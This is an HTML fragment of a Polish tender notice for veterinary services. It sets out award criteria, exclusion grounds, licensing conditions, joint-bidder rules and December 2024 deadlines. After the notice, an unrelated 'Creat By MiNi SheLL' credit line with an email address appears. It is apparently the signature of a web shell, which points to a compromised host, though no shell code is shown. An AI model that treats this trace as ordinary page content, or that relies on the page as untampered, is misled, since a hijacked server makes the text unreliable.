wówczas 0 punktów w kryterium.<br/>1) Zamawiający uzna za ofertę najkorzystniejszą tę, która nie będzie podlegać odrzuceniu i będzie spełniać warunki ustawy Pzp, a<br/>także wszystkie warunki niniejszej SWZ oraz uzyska największą liczbę punktów wynikających z w/w kryteriów oceny ofert. Punkty<br/>będą liczone do dwóch miejsc po przecinku.<br/>2) W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonej<br/>przez niego oferty.<br/>3) Zamawiający - powiadamiając o tym Wykonawcę - zgodnie z art. 223 ust. 2 ustawy Pzp, poprawi w ofercie Wykonawcy omyłki.<br/>Zgodnie z art. 223 ust. 3 w przypadku, poprawienia innych omyłek polegających na niezgodności oferty z dokumentami zamówienia,<br/>niepowodujące istotnych zmian w treści oferty, Zamawiający wyznaczy Wykonawcy odpowiedni termin na wyrażenie zgody na<br/>poprawienie w ofercie omyłki lub zakwestionowanie jej poprawienia. Brak odpowiedzi w wyznaczonym terminie uznaje się za<br/>wyrażenie zgody na poprawienie omyłki.<br/>4) Wykonawca, którego oferta uzyska najkorzystniejszy bilans punktowy zamówienia wynikający z kryteriów oceny ofert, będzie<br/>zobowiązany, na wezwanie Zamawiającego do dostarczenia dokumentów potwierdzających dane zawarte w oświadczeniach (druk<br/>Nr 1, 1A, 2 i 2A).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość lekarzy weterynarii [osoba]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na podjęcie interwencji [czas]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zdolność do występowania w obrocie gospodarczym	Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie.<br/>2.	Uprawnienia do prowadzenia <br/>określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów	1)	Wykonawca spełni warunek jeżeli wykaże, że posiada status lecznicy weterynaryjnej lub kliniki weterynaryjnej zgodnie z ustawą z dnia 18 grudnia 2003 r. o zakładach leczniczych dla zwierząt (Dz. U. z 2019 poz. 24)<br/>2)	Wykonawca spełni warunek jeżeli wykaże, że posiada umowę z Powiatowym Inspektoratem Weterynaryjnym dot. obserwacji zwierząt podejrzanych o wściekliznę w myśl art. 16 ustawy z dnia 29 stycznia 2004r. o Inspekcji Weterynaryjnej (Dz. U. z 2024 poz. 12)<br/>3.	Sytuacja ekonomiczna lub finansowa	Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie.<br/>4.	Zdolność techniczna <br/>i zawodowa	Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">PODMIOTOWE ŚRODKI<br/>DOWODOWE POTWIERDZAJĄCE BRAK PODSTAW DO WYKLUCZENIA WYKONAWCY /WYKONAWCÓW WYSTĘPUJĄCYCH<br/>WSPÓLNIE I PODMIOTU UDOSTĘPNIAJĄCEGO SWOJE ZASOBY WYKONAWCY, O KTÓRYCH MOWA W ART. 108 I ART. 109<br/>ORAZ W USTAWIE Z DNIA 13.04.2022 R. O SZCZEGÓLNYCH ROZWIĄZANIACH W ZAKRESIE PRZECIWDZIAŁANIA<br/>WSPIERANIU AGRESJI NA UKRAINĘ ORAZ SŁUŻĄCYCH OCHRONIE BEZPIECZEŃSTWA NARODOWEGO<br/>Oświadczenie w celu potwierdzenia aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego,<br/>o których mowa w art. 108 i art. 109 ustawy Pzp oraz w art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Oświadczenie na wezwanie Zamawiającego składa:<br/>1. Wykonawca (druk Nr 3);<br/>2. każdy spośród Wykonawców występujących wspólnie (druk Nr 3);<br/>3. podmiot udostępniający zasoby Wykonawcy (druk Nr 3A).<br/>Oświadczenie należy złożyć na wezwanie Zamawiającego, gdy Wykonawca polega na zasobach podmiotu udostępniającego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">PODMIOTOWE ŚRODKI DOWODOWE POTWIERDZAJĄCE SPEŁNIENIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU NA<br/>PODSTAWIE ART. 122 USTAWY PZP<br/>Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów Wykonawca spełni warunek jeżeli wykaże, że posiada status lecznicy weterynaryjnej lub kliniki weterynaryjnej zgodnie z ustawą z dnia 18 grudnia 2003 r. o zakładach<br/>leczniczych dla zwierząt (Dz. U. z 2019 poz. 24)<br/>Wykaz osób (sporządzony wg wzoru druk Nr 5). Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego<br/>wraz z informacjami na temat ich doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (druk Nr 5).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie stawia wymogu złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty Formularz oferty wypełniony ściśle wg załączonego do SWZ wzoru druku, podpisany przez<br/>upełnomocnionego przedstawiciela Wykonawcy/ Wykonawców występujących wspólnie określonych aktem rejestrowym<br/>z podaniem imienia i nazwiska wraz z kompletem oświadczeń dotyczących spełnienia warunków oferty i udzielenia<br/>zamówienia<br/>KRS/CEIDG Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu Wykonawcy jest umocowana<br/>do jego reprezentowania.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa, powyżej, jeżeli Zamawiający może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów w Formularzu oferty.<br/>Dotyczy także podmiotu udostępniającego zasoby.<br/>Pełnomocnictwo Pełnomocnictwo wystawione wg wzoru załączonego do niniejszej SWZ (druk Nr 4) lub pełnomocnictwa<br/>Wykonawcy. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy<br/>umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w pkt 2 niniejszej tabeli.<br/>Dotyczy także podmiotu udostępniającego zasoby.<br/>Oświadczenie o spełnieniu warunków udziału w postępowaniu Oświadczenie Wykonawcy o spełnieniu warunków udziału<br/>w postępowaniu, które na dzień składania ofert tymczasowo zastępuje podmiotowe środki dowodowe.<br/>Oświadczenie składa:<br/>1. Wykonawca (druk Nr 1);<br/>2. każdy spośród Wykonawców występujących wspólnie (druk Nr 1) w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu;<br/>3. podmiot udostępniający zasoby Wykonawcy (druk Nr 1a)<br/>w zakresie w jakim podmiot udostępnia swoje zasoby Wykonawcy.<br/>Oświadczenie dotyczące przesłanek wykluczenia z postępowania Oświadczenie Wykonawcy o braku podstaw do<br/>wykluczenia, które na dzień składania ofert tymczasowo zastępuje podmiotowe środki dowodowe.<br/>Oświadczenie składa:<br/>1. Wykonawca (druk Nr 2);<br/>2. każdy spośród Wykonawców występujących wspólnie (druk Nr 2);<br/>3. podmiot udostępniający zasoby Wykonawcy (druk Nr 2A).<br/>Oświadczenie należy złożyć i dołączyć do oferty, gdy Wykonawca polega na zasobach podmiotu udostępniającego.<br/>Oświadczenie podmiotu trzeciego o udostępnieniu swoich zasobów Wykonawcy Oświadczenie podmiotu trzeciego o<br/>udostępnieniu swoich zasobów<br/>w zakresie doświadczenia lub udostępnienia osób Wykonawcy<br/>w zakresie wskazanym w druku Nr 5A.<br/>Oświadczenie należy złożyć i dołączyć do oferty, gdy Wykonawca polega na zasobach podmiotu udostępniającego.<br/>Oświadczenie Wykonawców występujących wspólnie Oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia, z którego wynika, które czynności wykonają poszczególni Wykonawcy.<br/>Niniejsze oświadczenie składa się w formularzu oferty w pkt 11 i dotyczy tylko Wykonawców występujących wspólnie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego (w tym spółki cywilne) oraz winni spełniać<br/>następujące wymagania:<br/>1. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>2. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich<br/>w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia<br/>publicznego.<br/>3. Pełnomocnictwo powinno zawierać w szczególności:<br/>a. nazwę postępowania o udzielenie zamówienia publicznego, którego dotyczy,<br/>b. wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy<br/>z określeniem adresu siedziby,<br/>c. ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa.<br/>4. Pełnomocnictwo do pełnienia takiej funkcji winno być podpisane przez prawnie upoważnionych przedstawicieli każdego z<br/>Wykonawców występujących wspólnie i udzielających pełnomocnictwa, natomiast w przypadku spółki cywilnej przez<br/>każdego z jej wspólników.<br/>5. Pełnomocnictwo należy załączyć do składanej oferty w formie określonej w pkt 15 SWZ.<br/>6. Zamawiający w okresie realizacji zamówienia nie dopuszcza możliwości zmiany pełnomocnika poza zdarzeniami<br/>losowymi niewynikającymi z działań Wykonawcy. Wszelka korespondencja będzie prowadzona przez Zamawiającego<br/>wyłącznie z pełnomocnikiem.<br/>7. Oferta wspólna winna być podpisana przez ustanowionego pełnomocnika określonego w pełnomocnictwie,<br/>o którym mowa w punkcie powyżej.<br/>8. Wszyscy Wykonawcy występują wspólnie, a w przypadku spółki cywilnej wspólnicy, będą odpowiedzialni solidarnie za<br/>wypełnienie zobowiązań umownych. Takie oświadczenie złożone przez każdego z Wykonawców/ wspólników musi być<br/>częścią omawianego wcześniej pełnomocnictwa. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o<br/>zamówienie pełnomocnictwo to będzie załączone do umowy.<br/>9. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o spełnieniu warunków udziału w<br/>postępowaniu oraz oświadczenie o braku podstaw do wykluczenia składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te mają potwierdzać spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>10. W przypadku sformułowania przez Zamawiającego warunku dotyczącego uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co<br/>najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>11. W przypadku sformułowania przez Zamawiającego warunku dotyczącego wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>12. W przypadku, o którym mowa w pkt 9 i 10, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień umowy na podstawie art. 455 ust./ 1 ustawy Pzp. Szczegółowe<br/>zasady określone zostały w PPU stanowiących Druk nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-propublico.pl/Ogloszenia/Details/8da1f5fb-ffa7-4d71-b359-da2318baf85c</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com